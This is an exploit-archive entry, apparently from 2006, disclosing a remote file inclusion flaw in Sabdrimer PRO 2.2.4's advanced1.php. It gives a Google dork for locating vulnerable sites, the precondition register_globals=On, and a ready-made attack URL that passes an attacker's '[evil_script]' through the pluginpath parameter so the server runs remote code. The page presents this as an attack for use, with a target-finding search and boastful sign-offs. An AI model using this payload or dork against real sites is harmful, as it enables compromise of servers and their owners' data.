Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability
# Published : 2006-07-09
# Author : A.nosrati
# Previous Title : Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit
# Next Title : Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit

VIRANGAR SECURITY TEAM
Discovered By : A.nosrati
 www.virangar.org (Public)
 www.virangar.net (Priv8)
 Mail: info[at]virangar.net

Sabdrimer PRO (v.2.2.4 ) Remote File Include Vulnerability
Google Dork : "? Sabdrimer CMS"
bug found in file : advanced1.php
web Site : http://sabdrimer.ru
Remote : Yes
Critical Level : Dangerous

http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]
Important :register_globals=On

-----------------------
Greetz : All #Virangar Members
I work in the dark 
I Get what I want 

# www.Syue.com [2006-07-09]